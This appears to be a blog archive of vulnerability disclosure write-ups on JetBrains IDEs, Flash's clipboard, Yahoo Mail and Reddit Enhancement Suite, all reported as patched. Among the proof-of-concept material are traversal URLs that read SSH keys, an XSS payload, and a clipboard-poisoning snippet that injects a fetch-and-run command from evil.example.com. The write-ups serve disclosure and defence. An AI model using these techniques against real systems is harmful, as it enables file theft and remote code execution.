From at least 2013 until May 2016 JetBrains’ IDEs were vulnerable to local file leakage, with the Windows (EDIT: and OS X) versions additionally being vulnerable to remote code execution. The only prerequisite for the attack was to have the victim visit an attacker-controlled webpage while the IDE was open.
Affected IDEs included PyCharm, Android Studio, WebStorm, IntelliJ IDEA and several others.
I’ve tracked the core of most of these issues (CORS allowing all origins + always-on webserver) back to the addition of the webserver to WebStorm in 2013. It’s my belief that all JetBrains IDEs with always-on servers since then are vulnerable to variants of these attacks.
The arbitrary code execution vuln affecting Windows and OS X was present in all IDE releases since at least July 13, 2015, but was probably exploitable earlier via other means.
All of the issues found were fixed in the patch released May 11th 2016.
To follow along with this you’ll need a copy of PyCharm 5.0.4 or an old build of PyCharm 2016.1, since these issues have been patched for a while now. Obviously you’ll want to do this in a VM.
I had just started working on some inter-protocol exploitation research and was looking for some interesting targets. Thinking that I must have some interesting services running on my own device, I ran lsof -P -iTCP | grep LISTEN
to see what programs were listening on a local TCP port. I got back:
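Those PyCharm listeners are easy to double-check without lsof — a quick TCP probe does the same job. A minimal Python sketch (63342 is the built-in webserver port discussed below; the other ports probed are just guesses):

```python
import socket

def port_open(host, port, timeout=0.5):
    """Return True if a TCP connect() to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    # 63342 is PyCharm's built-in webserver; the neighbours are guesses.
    for port in (63342, 63343, 63344):
        print(port, port_open("127.0.0.1", port))
```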
Hmm, I’ve used PyCharm as my IDE of choice for a while now, but never noticed that it bound to any ports… Might it be some sort of ad-hoc IPC mechanism? Let’s nmap it to figure out what’s being sent over those ports, and what the protocol is:
Looks like an HTTP server? Unusual for a local application… Let’s see what CORS headers it serves up with responses:
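The important part of those headers is that the server reflects whatever Origin you send straight back in Access-Control-Allow-Origin, with credentials allowed. Here’s a self-contained Python sketch of that check, with a toy server standing in for PyCharm’s permissive behaviour (everything here is illustrative):

```python
import http.server
import threading
import urllib.request

class PermissiveHandler(http.server.BaseHTTPRequestHandler):
    """Stand-in for PyCharm's built-in server: reflects any Origin back."""
    def do_GET(self):
        origin = self.headers.get("Origin", "")
        self.send_response(200)
        # The vulnerable behaviour: whatever origin asks, it's allowed,
        # credentials included.
        self.send_header("Access-Control-Allow-Origin", origin)
        self.send_header("Access-Control-Allow-Credentials", "true")
        self.end_headers()
        self.wfile.write(b"hello")
    def log_message(self, *args):  # keep the demo quiet
        pass

def check_cors(url, origin):
    """True if the server lets `origin` make credentialed reads."""
    req = urllib.request.Request(url, headers={"Origin": origin})
    with urllib.request.urlopen(req) as resp:
        allow = resp.headers.get("Access-Control-Allow-Origin")
        creds = resp.headers.get("Access-Control-Allow-Credentials")
    return allow == origin and creds == "true"

if __name__ == "__main__":
    server = http.server.HTTPServer(("127.0.0.1", 0), PermissiveHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/" % server.server_port
    print(check_cors(url, "http://attacker.com"))  # True == any origin may read
    server.shutdown()
```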
Something smells off here. PyCharm’s HTTP server is essentially saying that web pages on any origin (including http://attacker.com
) are allowed to make credentialed requests to it and read the response. What the heck is this HTTP server, though? Does it serve anything sensitive? Do we even care if random pages are able to read its contents?
After searching the web for references to that port number, we find that this is related to a WebStorm feature added in early 2013 (WebStorm is another of JetBrains’ IDEs.) The idea was that you wouldn’t need to set up your own web server to preview your pages in a browser. You could just click a “view in browser” button inside WebStorm and it would navigate your browser to http://localhost:63342/<projectname>/<your_file.html>
. Any scripts or subresources that the page tried to include would similarly be served up via URLs like http://localhost:63342/<projectname>/some_script.js
. Fancy.
To verify that PyCharm embeds the same server as WebStorm, let’s create a project named “testing” in PyCharm and place a file named “something.txt” in the root and see if we can fetch it:
Yikes, so any site can read any of your project files so long as they can guess the project name and filename. This would obviously include any in-tree configuration files that contained secrets like AWS keys and the like. Here’s an HTML snippet we could include on attacker.com
that would do the same thing as our cURL command:
This is pretty bad, but as-is this would mostly be useful for targeted attacks. It’s a pain to have to guess at directory structures to get at the interesting files, so what are some ways we can weaponize this?
Let’s see if we can read files outside of the project directory. There are some files (like SSH keys, etc) that live at standard locations and are interesting for an attacker. Much more interesting than possible credentials for some database that might not even be accessible to us.
The obvious thing to do is see how it handles dot segments in the request URI:
Bah. Per the spec dot segments in paths must be normalized away by either the client or the server. cURL’s behaviour here is the same as you’d see in a browser. Luckily PyCharm’s internal HTTP server treats dot segments with urlencoded /
s like %2F..%2F
as semantically equivalent to the unencoded /../
form, and browsers will not normalize those away.
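The crucial difference between the two forms can be shown without PyCharm at all: the literal /../ gets normalized client-side, while the %2f form reaches the server intact and only becomes a traversal once the server decodes it. A Python sketch (paths illustrative):

```python
from urllib.parse import urlsplit, unquote

project_url = "http://localhost:63342/testing"

# A literal traversal: browsers and cURL normalize this away client-side,
# so the server never sees the dot segments.
naive = project_url + "/../../../../etc/passwd"

# The encoded form survives: %2f isn't a path separator to the client,
# so no normalization happens -- but PyCharm's server decoded it and
# treated it as one.
encoded = project_url + "/..%2f..%2f..%2f..%2fetc/passwd"

# What PyCharm's server effectively saw after decoding:
decoded_path = unquote(urlsplit(encoded).path)
print(decoded_path)  # /testing/../../../../etc/passwd
```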
Great success! Our only limitation here is that we must know the name of a project the victim has open. Requesting /invalidproject/<anything>
will always 404.
The obvious choice is to use a dictionary of potential project names a user could have open, and try to request /<potential_projectname>/.idea/workspace.xml
(which is a metadata file automatically added to most JetBrains projects.)
We got a 200 for testing
, so we know it’s a valid project.
A naive PoC for this in JavaScript:
There’s no rate-limiting, and I was able to try about 2000 project names a second using this method with Chrome even on my older laptop.
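The PoC’s core loop is simple enough to sketch in Python, with a toy server standing in for the IDE (only the project name testing “exists” here; the wordlist and server are illustrative):

```python
import http.server
import threading
import urllib.request
import urllib.error

VALID_PROJECTS = {"testing"}  # stand-in for whatever the victim has open

class FakeIDE(http.server.BaseHTTPRequestHandler):
    """Answers like the IDE: 200 for files in open projects, 404 otherwise."""
    def do_GET(self):
        project = self.path.strip("/").split("/")[0]
        if project in VALID_PROJECTS:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"<project/>")
        else:
            self.send_error(404)
    def log_message(self, *args):
        pass

def find_projects(base, wordlist):
    """Probe /<name>/.idea/workspace.xml for each candidate project name."""
    found = []
    for name in wordlist:
        try:
            urllib.request.urlopen("%s/%s/.idea/workspace.xml" % (base, name))
            found.append(name)  # 200 -> the project is open
        except urllib.error.HTTPError:
            pass  # 404 -> not a valid project
    return found

if __name__ == "__main__":
    server = http.server.HTTPServer(("127.0.0.1", 0), FakeIDE)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_port
    print(find_projects(base, ["django", "testing", "flask-app"]))  # ['testing']
    server.shutdown()
```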
At this point, I started looking at the various APIs that PyCharm exposed via the same webserver. Having to guess a valid, open project name to leak files is a big mitigating factor, and the API might give us a way around that.
Eventually I came upon the /api/internal
endpoint, which corresponds to JetBrainsProtocolHandlerHttpService
. Apparently this lets you pass in a JSON blob containing a URL with a jetbrains:
scheme, and the IDE will do something special with it. As far as I can tell, none of the IDEs actually install a systemwide handler for those URLs, and those URLs are undocumented. In any case, let’s look for some interesting jetbrains:
URLs we can pass it.
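Mechanically, driving that endpoint just means handing it a small JSON blob. The exact schema isn’t something I can vouch for here, so treat this Python sketch of the payload as an assumption:

```python
import json

def internal_payload(project, path):
    """Build a JSON blob for /api/internal carrying a jetbrains: URL.

    The {"url": ...} shape is an assumption for illustration only."""
    url = "jetbrains://%s/open/%s" % (project, path)
    return json.dumps({"url": url})

payload = internal_payload("testing", "something.txt")
print(payload)  # {"url": "jetbrains://testing/open/something.txt"}
```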
The jetbrains://<project_name>/open/<path>
handler seems promising:
This lets us open a project by passing in its absolute path. The /etc
directory exists on most *NIX-like systems, let’s try opening that:
Dang, so the directory needs to actually contain a JetBrains-style project, we can’t just pass any old directory. Lucky for us, PyCharm 2016.1 and above ship with a JetBrains-style project in their system folder! Under OS X this will be in /Applications/PyCharm.app/Contents/helpers
, let’s try that:
Bingo. Now we don’t have to guess at an open project name as we now know the helpers
project is open. There’s no standard location for PyCharm’s root folder under Linux (it’s wherever the user happened to untar
it to,) but we can determine it by requesting /api/about?more=true
and looking at the homePath
key:
Once we’ve opened the helpers
project, we determine the user’s home directory from the /api/about?more=true
response and use that to construct a URL to their SSH keys like /helpers/..%2f..%2f..%2f..%2f..%2f..%2fhome/<user>/.ssh/id_rsa
:
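Putting those steps together: parse homePath out of the about response, guess the username from it, and build the encoded-traversal URL. A Python sketch (the sample JSON, the /home/<user> heuristic, and the fixed traversal depth are all assumptions):

```python
import json

def ssh_key_url(about_json, depth=6):
    """Build the encoded-traversal URL to the user's SSH key.

    `depth` is how many ..%2f segments to prepend -- enough to reach /
    from wherever the helpers project lives (assumed here)."""
    home = json.loads(about_json)["homePath"]   # e.g. /home/victim/pycharm-2016.1
    user = home.split("/")[2]                   # crude: assumes /home/<user>/...
    traversal = "..%2f" * depth
    return "http://localhost:63342/helpers/%shome/%s/.ssh/id_rsa" % (traversal, user)

sample = '{"homePath": "/home/victim/pycharm-2016.1"}'
print(ssh_key_url(sample))
# http://localhost:63342/helpers/..%2f..%2f..%2f..%2f..%2f..%2fhome/victim/.ssh/id_rsa
```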
The above trick with opening the helpers
directory that ships with PyCharm obviously only works if the user has PyCharm 2016.1 installed; everywhere else we still have to guess an open project name. How about something that works reliably with the other JetBrains IDEs like IntelliJ IDEA and Android Studio?
Since the jetbrains://project/open
handler lets us pass a completely arbitrary path for the project to open, UNC paths are an obvious choice. UNC paths are a Windows-specific path form that allows you to reference files on a network share, and they look like \\servername\sharename\filepath
. Many of Windows’ file APIs (and the Java APIs that wrap them) will happily take UNC paths and transparently connect to an SMB share on another computer, allowing you to read and write to the remote files as if they were local. If we can get the IDE to open a project from our SMB share, we won’t need to guess at what projects might be on the victim’s computer.
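The shape of the attack URL is then just a jetbrains: open URL wrapped around a UNC path. A Python sketch (hostname, share, and project names are illustrative, and the exact parameter layout of the handler is an assumption):

```python
def unc_project_url(server, share, project):
    """Build a jetbrains: URL that opens a project straight off a remote
    SMB share via a UNC path (parameter layout assumed)."""
    unc = r"\\%s\%s\%s" % (server, share, project)
    return "jetbrains://%s/open/%s" % (project, unc)

url = unc_project_url("evil.example.com", "anontesting", "haxproject")
print(url)  # jetbrains://haxproject/open/\\evil.example.com\anontesting\haxproject
```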
To test, I set up a remote Samba instance with an unauthenticated SMB share named “anontesting” that contained a JetBrains project, then tried opening it:
Great. Assuming the victim’s ISP doesn’t block outbound SMB traffic (due to the large number of worms that have historically propagated via SMB vulns) we can get them to load an arbitrary project from an SMB share we control.
Wait a second, seems like we can do something a lot more interesting than arbitrary file reads. With one request we can get Windows users to load an attacker-controlled project from our remote SMB share. There’s almost certainly abuse potential here, and we don’t have to look far to find it.
The projects for each of JetBrains’ IDEs have a notion of startup tasks. In PyCharm you can have a Python script run automatically on project load, and similarly on Android Studio and IntelliJ IDEA you can have a .jar
run. Here I’ve made it so that the hax.py
script in the project root will be automatically run when the project opens:
Now we just need to add a hax.py
file to our project root containing:
We then put the project on our anonymous SMB share, and host a page with our payload that will cause the victim to load the malicious project:
As soon as the victim navigates to that page, our payload will trigger and the calculator will open:
After this post was initially published comex pointed out that OS X will auto-mount remote NFS shares when you access them via the /net
autofs
mountpoint. That means exploiting the RCE under OS X is pretty similar to Windows, but we create an anonymous NFS share and open /net/<hostname>/<sharename>/<projectname>
:
with the HTML PoC looking something like:
This likely applies to any *NIX-like with an autofs
mountpoint that uses -hosts
, but OS X is the only OS I could find where autofs
is configured like this in the default install.
JetBrains took several steps that I’m aware of to remediate this:

- … 4xx status code.
- The Host header’s value is now validated to prevent similar exploits via DNS rebinding.

I’d like to specifically thank Hadi Hariri and the rest of the JetBrains team for their proactive response to my report. My email requesting a security contact was answered within an hour of my sending it, and the issue was resolved relatively quickly.
They sent me a patchset against intellij-community
and a binary build with their proposed solutions, and were receptive to my feedback when I mentioned potential issues.
Lastly, even though JetBrains doesn’t have a bug bounty program that I’m aware of, and I definitely wasn’t expecting anything, JetBrains quite generously awarded a bounty of $50,000 for my report and help reviewing the patch. I’ve asked them to donate the bulk of this to the PyPy project to fund improved Python 3 support, fingers crossed for async/await
support in PyPy :).
- … intellij-community repo for review

Flash only allows read access to the clipboard in event handlers triggered by paste events, but Flash wasn’t checking whether the clipboard contents had changed since entering the event handler. Due to quirks in how Flash’s event handlers work, an attacker could read from and write to the clipboard for hours after the user navigated away from the page containing the SWF, or even closed the incognito window it was in.
All that messing around with Flash in my previous posts made me think that I should read more into Flash security. Even if you hate Flash as a user, it’s deployed pretty much everywhere, and it’s valuable attack surface! It ended up paying off: after a couple of days of testing and reading the docs, I was left with a new bug, CVE-2014-0504:
Let’s go into the combination of issues and possibly surprising behaviour in Flash that allowed clipboard leaking.
This isn’t the first time Flash has had issues with clipboard access. Back in the days of Flash 9, you could write to the clipboard with no interaction at all. That caused a few problems, so when Flash 10 rolled around, Adobe added a few restrictions to clipboard functionality:
First, the new Clipboard
API only allowed writing to the clipboard when inside certain event handlers (mousedown
, keydown
, copy
, etc.)
Second, that event handler had to have been triggered by user interaction, meaning that event handlers triggered by dispatchEvent
et al. cannot write to the clipboard.
Additionally, a method allowing you to read from the clipboard was added. This was restricted even more, and could only be called inside user-initiated paste
events.
We’ve established that to call Clipboard.getData
we must be in a paste
event handler, and that handler must have been triggered by the user. As far as I can tell, there’s no way around that. Can we still abuse it?
The obvious thing to check is if we can block inside the event handler. In many browsers, blocking in an event handler in Flash will cause a plugin hang, and a prompt to kill the plugin will spawn. Chrome, however, keeps right on trucking, even when Flash is executing something like while(true){;}¹. The UI and JavaScript all work as usual; a prompt to kill the plugin will only be displayed if the user opens another tab that uses Flash. Actually, our handler will continue to execute even when the tab containing our SWF is closed!
Given that we aren’t really penalized for sitting around in a privileged event handler, there’s nothing to stop us from just calling Clipboard.getData()
in a loop and checking for changes. We can just get the user to paste something non-sensitive, then abuse our clipboard access to read sensitive information that gets added to it later.
Here’s a basic demonstration of the issue:
To trigger the exploit, we need to convince the victim to paste something into our SWF. There are a number of usage patterns we could abuse to do that, but I liked the fake captcha method kkotowicz used for his cross-domain content extraction attack. We give the user a random string, and ask them to paste it into a “verification box” (actually our SWF,) telling them it’s required to prove they’re not a bot:
Flash will not allow a single event handler to run for longer than 60 seconds. A 60 second window for clipboard access is obviously not ideal for us.
Luckily, the time limit is on individual event handlers, and the paste event bubbles. We can just give our paste target tons of parent elements that also handle paste events, and allow the event to bubble up before each handler gets killed. Then we can log the clipboard for ~60 seconds * <num of parents>:
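The arithmetic behind the trick: each handler in the bubbling chain gets its own 60-second budget, so total clipboard access scales linearly with the number of parents. As a trivial Python sketch:

```python
PER_HANDLER_LIMIT = 60  # seconds before Flash kills a single handler

def total_window(num_parents):
    """Total clipboard-polling time when the paste event bubbles through
    num_parents extra handlers plus the original target."""
    return PER_HANDLER_LIMIT * (num_parents + 1)

print(total_window(59))  # 3600 seconds -- an hour of clipboard access
```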
Unfortunately, I couldn’t find a way to make Flash send HTTP requests while inside the event handler. However, we can pass the data to JavaScript and have it send the data to our servers, since our ActionScript handlers won’t block JS:
1
|
|
1 2 3 |
|
The ExternalInterface
method has the caveat that it will longer work after we’ve navigated away from the page or the tab was closed, even though our event handler will continue to run. As a fallback, we can use Flash’s TCP socket support, which allows synchronous communication. Again, with a caveat that it only seems allow sending a single message while in the event handler 2:
So we can leak the clipboard remotely even after navigating away. That’s neat, but we can actually do a lot more! Remember how Flash allows us to write to the clipboard in certain handlers as well? That lets us do all sorts of sneaky things, like detect when someone copies what looks like HTML, and then modify it to include a malware script. Even better, we can detect clipboard contents that look like commands and slip our own payload into them!
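The detect-and-replace logic is only a few lines; here’s a Python sketch of the idea (the original was ActionScript, and the command patterns and payload here are illustrative):

```python
import re

PAYLOAD = "curl -s http://evil.example.com/x.sh | sh; "

def poison(clipboard_text):
    """If the clipboard looks like a shell command, prepend our payload.

    A victim pasting into a terminal rarely re-reads what they pasted."""
    looks_like_command = re.match(r"^\s*(sudo|curl|wget|git|apt|brew)\b",
                                  clipboard_text)
    if looks_like_command:
        return PAYLOAD + clipboard_text
    return clipboard_text

print(poison("sudo apt install foo"))
print(poison("just some prose"))
```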
The code for a full PoC is here, and a live version without the echo server is also up here.
The initial fix was to expose a sequence number to Flash so it could tell whether the clipboard state had changed since the initial event was raised, and block access to the clipboard if it had. That stayed in place for a while, but some time after that it was replaced with a change that blocked clipboard reads 10 seconds after the event was raised. If I had to guess why, some application probably relied on being able to do multiple clipboard reads and writes in the same event handler.
Being able to read the clipboard 10 seconds after the initial paste event still seems a bit much, but it’s definitely better than how it was before.
- The Socket class is useful for something other than bypassing the user’s proxy!

1. Firefox on Linux demonstrates similar behaviour, but allows Flash’s event handlers to continue executing even after the browser has closed. ↩
2. Again, Firefox on Linux behaves differently. You can send / receive as much as you want, even after the browser has closed. It’s possible that Chrome’s behaviour is a bug. ↩
A .swf on Yahoo’s CDN had a vulnerability that enabled near-complete control over Yahoo! Mail crossorigin. The .swf itself is fixed, but the configuration issue that allowed a .swf completely unrelated to Yahoo! Mail to do something like that still exists.
So, in the last article we established that YMail’s crossdomain.xml
rules are incredibly lax:
They allow .swfs on any subdomain of yahoo.com
to read resources on YMail crossorigin. Last time we abused a crossorigin proxy on hk.promotions.yahoo.com
to serve up our own .swf that would request pages from YMail and leak them back to us. The crossorigin proxy has since been patched, but the loose crossdomain.xml
rules remain. Assuming there’s no way for us to serve our own .swf through yahoo.com
anymore, how can we exploit these rules without using MITM attacks? Well, we abuse vulnerabilities in .swfs that are legitimately hosted on subdomains of yahoo.com
.
Let’s look for a .swf that will allow us to make arbitrary requests, and read the response. With a little searching we find a good candidate, hotspotgallery.swf, related to a feature on Yahoo! Autos that gives 3D tours of cars. Normally it’s served up on sp.yimg.com
, which isn’t a domain allowed by YMail’s crossdomain.xml
, but with a little finagling we find that the same .swf can also be accessed on img.autos.yahoo.com.
Let’s take a peek at the ActionScript from the decompiler to see why this .swf is useful to us:
Immediately we notice the Security.allowDomain("*")
, which is usually not a good sign. The reason for that is Flash has a feature where you can embed a crossorigin .swf inside your own. You can access and call the public members of the embedded .swf’s MovieClip
object, but normally this is disallowed unless the embedding .swf is same-origin with it.
Security.allowDomain()
allows you to relax that restriction for specific domains, and this .swf is saying .swfs from any domain can access its MovieClip
’s public members. Security.allowDomain("*")
isn’t necessarily a security issue on its own, unless your .swf’s public members do or store something security sensitive. Now, this .swf is vulnerable, and to see why we’ll look at the loadXML2()
method:
As you can see, the code makes a request to this.dataPath
concatenated with this.exteriorXML1
. When it gets a response, it parses it as XML, and stores the result in this.DATA3
. But we control all 3 of those members due to the public
access modifiers and Security.allowDomain("*")
, and can both read from and write to them from .swfs on our own domain. Given that we control the URL requested, can read the response, and can trigger the behaviour at will, all from a crossorigin Flash document, we’ve got crossorigin data leakage!
Well… with a few caveats:

- … GETs

Let’s start by making some ActionScript to embed and exploit hotspotgallery.swf. From here on you will need to be logged in to Yahoo! for some links to work. Here we’ve got a very simple JS<->Flash proxy in the style of CrossXHR. It loads up the vulnerable .swf, sets its public members so it’ll request the resource we want to leak, then returns the response back to JS:
Now here’s the tricky part. We need to find interesting, leakable endpoints. We can’t leak them if they return invalid XML (ruling out most webpages and JSON containing HTML fragments,) we can’t leak them if they return a non-200 status code, and we can’t leak them if they require an auth token we can’t guess.
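Those three constraints boil down to a quick triage check per endpoint. A Python sketch (names illustrative):

```python
import xml.etree.ElementTree as ET

def leakable(status_code, body, needs_auth_token=False):
    """Can the vulnerable .swf leak this endpoint's response?

    Requirements from above: 200 status, body parses as XML,
    and no unguessable auth token required."""
    if status_code != 200 or needs_auth_token:
        return False
    try:
        ET.fromstring(body)
        return True
    except ET.ParseError:
        return False

print(leakable(200, "<contacts><c name='alice'/></contacts>"))  # True
print(leakable(200, '{"json": "not xml"}'))                     # False
print(leakable(404, "<error/>"))                                # False
```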
Some alternative endpoints for the Social API fit the bill nicely. They let us fetch the current user’s contacts and profile without requiring an auth token or user ID. You can see those leaking to a page we control here:
One that stumped me for a long time was getting the user’s mail. All of the endpoints for mail listings required a valid WSSID (web services session id?) Unfortunately, all the endpoints I could find that would give me one had non-200 response codes or wouldn’t parse as XML. I eventually found what I was looking for by running YMail’s android app through mitmproxy. Here you can see the WSSID we wanted, returned with a 200 response code. Even though this endpoint’s normally requested with a POST
method, a GET
with no params still gives us the WSSID… Sweet!
Let’s leak the user’s mail now. We’ve got a mail search endpoint here that will return mail fragments without embedded HTML. You can see you’ll still sometimes get angle brackets in the response due to inline replies, but you can muck with the query to get around those.
Now, that WSSID functions as a CSRF token as well, so we can now do anything we want as the current user. We can send mail as them, delete all their emails, basically anything a normal user can do.
Here’s a small page demonstrating a bunch of things we can do as long as the user is on a page we control. As you can see, we’ve got the full list of contacts, all of the user’s personal details including their email address and name, and a listing of their emails.
We’ve got enough for a fully-weaponized exploit at this point. We can not only leak their emails, we can also achieve lateral movement by triggering password resets on other services they use, and pulling the reset URLs right out of their email, then deleting them. Of course, previously emailed username/password combos are fair game, too. Very handy for the APT folks ;)
hotspotgallery.swf
’s allowDomain call has since been changed to Security.allowDomain("sp.yimg.com")
, but that doesn’t fix the core issue. There are thousands and thousands of forgotten .swfs on disused subdomains, many of which are probably vulnerable to similar exploits. As long as those crossdomain.xml
rules are as loose as they are, it’s only a matter of time before someone finds one and exploits YMail… again.
.swfs that actually need crossorigin access to YMail should be moved to the existing mail.yimg.com
subdomain, and the crossdomain.xml
should be tightened up to keep YMail safe from rogue galleries of Asian imports and pet shows.
The other thing I want to mention is the initial response I got. I initially submitted an overview of the issue and attached a proof-of-concept that put the JSON from the contacts endpoint in a textbox. Very rudimentary, but sufficient to show crossorigin data leakage. All I got in response was a form reply basically saying “This is intended behaviour, wontfix”. I replied asking why they thought that, and if they had any issues reproducing the issue, but didn’t receive a reply.
I know that reproing Flash issues can be a pain in the ass, and I realized the PoC would break if served from localhost, so I hosted a version with no setup required that more clearly showed what was leaked. I posted a link to the new PoC, reiterating what was being leaked. Still no response. It wasn’t until I posted the version that leaked mail contents 8 months later that I got an unscripted reply.
I get that Yahoo! probably receives tons of spurious reports every day, but without something actionable like “I don’t think X is a bug because Y” or “I’m unable to reproduce the issue, Z happens instead”, reporters don’t have anything to go on if they’re reporting a genuine issue. Without any feedback on what the issue is with the report, their only way to potentially get the bug fixed is through public disclosure (which an operator of a bug bounty probably doesn’t want.) I also know this isn’t an isolated case, since I recently saw a presentation where an RCE on Yahoo!’s reverse proxies got the same treatment.
To Yahoo’s credit, the fellow who responded to my updated proof-of-concept was decently communicative, but every response I’d ever received from Yahoo up ‘til that point had been a scripted response of “fixed”, “wontfix”, “confirmed”, or “new”. When I work with a company (either as a consultant or just through one-off reports,) nothing impresses me more than engineers responding with additional details relevant to my reports, and nothing turns me off more than the company being difficult to communicate with, money or no.
- … crossdomain.xmls are fixed, .swfs and endpoints where the whole response body is controlled are extra-juicy targets
- … yimg.com may also be available on l.yimg.com, or even subdomains of yahoo.com
- … yimg.com. I never bothered auditing them because they’re a pain to trace through, but the WayBack Machine is your friend when it comes to finding these orphaned .swfs

The library that Reddit Enhancement Suite (a browser extension for reddit users) used for HTML sanitization had a bug that bit them pretty hard, enabling DOM-based XSS of 1.5~ million reddit users. RES pushed out a fixed version, and reddit deployed a script to prevent users of the old version from accidentally getting exploited; thus preventing an XSS worm.
If you’re a user of Reddit Enhancement Suite, chances are you recently saw this big scary alert() box when you tried to click an expando button:
For those who aren’t familiar with RES, an expando is an inline preview of offsite content, or content that would normally require a clickthrough, that can be viewed by pressing an “expando” button:
A few people have asked questions like “why am I getting that alert?”, “what exactly is this bug?”, “why can’t I just use the vulnerable version anyways?”. Rather than respond to each question separately, I decided to write something that would hopefully answer everyone’s questions at once.
Interestingly, the most important part of the RES exploit wasn’t found by looking at RES at all. I actually found it by poking around reddit’s markdown library, Snudown. Snudown is mostly written in C, and is a fork of the Sundown markdown library. Snudown departs from Sundown in a number of ways, the most important to us being that it adds the ability to include a restricted subset of HTML alongside your markdown. On reddit, markdown with inline HTML may only be used on the wiki, as it’s intended to allow using HTML tables instead of Sundown’s unwieldy markdown tables.
So let’s go into a simplified view of how Snudown did attribute whitelisting. Snudown scanned everything after the tag name, and before a >
for valid attr=value
pairs, reading everything into the attr
buffer as it went. Once Snudown realized it was not dealing with a valid attr/value pair, it would clear the attr buffer and start looking for the next valid pair. Once it decided it had hit the end of the value (by encountering a space outside the quotes, or a >
anywhere), it would output everything in the attr
buffer, clear it, then continue parsing attributes. Some interesting consequences of the process, <table scope== scope=bar>
was sanitized to <table scope=bar>
, and <table bad=scope="bar">
was sanitized to <table scope="bar">
.
Those outputs aren’t consistent with most HTML parsers, but the biggest issue was how it handled quotes: Snudown saw <table scope=a' bar=baz'>
as a table
with a single scope
attribute, but every mainstream browser sees this as a table
with both scope
and bar
attributes. Quotes are only treated as attribute delimiters when they occur at the beginning of the value, otherwise whitespace is the delimiter. Since Snudown was outputting every validated attr/value pair verbatim, we could abuse this behaviour to sneak attributes like onmouseover
by the whitelist!
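You can reproduce the browser-style interpretation with Python’s html.parser, which tokenizes unquoted attribute values much like browsers do: the markup Snudown saw as a single scope attribute comes apart into two attributes.

```python
from html.parser import HTMLParser

class AttrCollector(HTMLParser):
    """Record the attributes of the first start tag we see."""
    def __init__(self):
        super().__init__()
        self.attrs = None
    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = attrs

parser = AttrCollector()
parser.feed("<table scope=a' bar=baz'>")
# Snudown treated this as one scope attribute; a browser-style tokenizer
# sees two attributes, scope and bar, with stray quotes in the values.
print(parser.attrs)
```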
So does this mean reddit itself was vulnerable? No. See, even though Snudown performs its own sanitization on inline HTML, Snudown’s output generally isn’t trusted within reddit’s codebase. All of the HTML that comes out of Snudown gets put through a SAX / BeautifulSoup-based sanitizer that validates the HTML and reserializes it in a way that’s unambiguous across browsers. For example, the ambiguous:
passes both validation steps, but becomes the unambiguous:
when reserialized by reddit’s SAX sanitizer.
To reiterate, though reddit used Snudown’s wiki rendering mode, reddit was never vulnerable to XSS due to additional precautions taken with its output.
I knew that reddit itself wasn’t vulnerable, so before I did anything, I wanted to check if anyone else was using Snudown’s wiki rendering mode in production, outside of users of the reddit codebase. One thing that kept popping up was SnuOwnd, a faithful port of Snudown (with all its quirks) to JS. As some of you may have noticed from the RES changelogs, the Reddit Enhancement Suite also includes SnuOwnd. RES actually uses SnuOwnd for a number of things, and that used to include HTML sanitization:
Eep.
Even if we can’t get an XSS on reddit.com proper, RES is still a pretty juicy target. With an install base of 1.5~ million users — which includes a good chunk of reddit’s moderators — an XSS in RES could do a lot of damage.
Now all that’s left is to find where safeHTML or sanitizeHTML are passed untrusted data, and we’ve got ourselves an XSS via extension. If it wasn’t apparent from the alert dialog, that injection point is in RES’ expandos:
imageLink.imageTitle
is completely controlled by the attacker, and provided we can get one of RES’ supported sites to serve our Snudown-evading payload, RES will inject it into the DOM.
RES supports expanding text posts from Tumblr inline, and Tumblr allows us to use valid HTML in post titles, so if we made a post with the title Foobar <img src=foo' onerror="alert(1)" ' />
, alert(1)
would be called when they expanded our link:
This was about as bad as it gets without having a zero-interaction XSS. Comment pages have a “Show Images” button that expands all images on the page, and those get used a lot for picture threads. Had someone posted a child comment to one of the top comments with a link to the payload, they could have easily started an XSS worm that spammed links to the payload in other threads. Once it spread, the worm could have done things like upvote specific submissions, nuke a subreddit if a moderator got exploited, etc.
This bug required fixes in a number of places to keep it fully closed. First, Snudown’s HTML sanitization was changed to first parse the attributes, then unambiguously reserialize its interpretation. That fix was then ported to SnuOwnd’s JS implementation.
Secondly, RES was changed to use a custom HTML sanitizer based on DOMParser since things like href
sanitization were out of scope for Snudown. I’m not super happy with this filter, and I think Google Caja should be used in the future, but this one had to go in due to time constraints.
Third, since the issue was so trivial to exploit, and had such high impact, it was necessary to block users still on vulnerable versions of RES from opening expandos to prevent an XSS worm from spreading. reddit ended up doing this on their end by detecting attempts to open the expandos and blocking it based on a version number RES places in the DOM:
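reddit's actual code isn't preserved in this copy; a hypothetical sketch of that version gate (the cutoff version number and function names are invented for illustration):

```javascript
// Hypothetical sketch of the version gate (not reddit's actual code):
// RES stamps its version into the DOM, and the page refuses to honor
// expando clicks when that version predates the fix.
const FIRST_PATCHED = [4, 5, 4]; // illustrative version, not the real cutoff

function isVulnerable(resVersion) {
  const parts = resVersion.split('.').map(Number);
  for (let i = 0; i < FIRST_PATCHED.length; i++) {
    const p = parts[i] || 0;
    if (p !== FIRST_PATCHED[i]) return p < FIRST_PATCHED[i];
  }
  return false; // equal to the patched version
}

console.log(isVulnerable('4.5.3')); // true  — older than the patched build
console.log(isVulnerable('4.5.4')); // false — patched
```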
Since Yahoo recently revamped their Responsible Disclosure program, I figured I’d have a go at finding some vulnerabilities. All of *.yahoo.com
is in scope, and Yahoo has a lot of legacy behind it, so I started going through the more obscure subdomains manually. One of the subdomains I looked at a lot was hk.promotions.yahoo.com
. It’s a good place to look because it has lots of PHP scripts and Flash, it looks like it wasn’t done by Yahoo’s core devs, and most auditors aren’t looking there since its content is mostly in Chinese.
I ended up on http://hk.promotions.yahoo.com/petshow2011/
, apparently a page for a Hongkongese pet show that happened in 2011:
As you can see from the request log, something on the page was requesting data from another domain through a crossdomain proxy: http://hk.promotions.yahoo.com/petshow2011/php/getImages.php?file=<url>
.
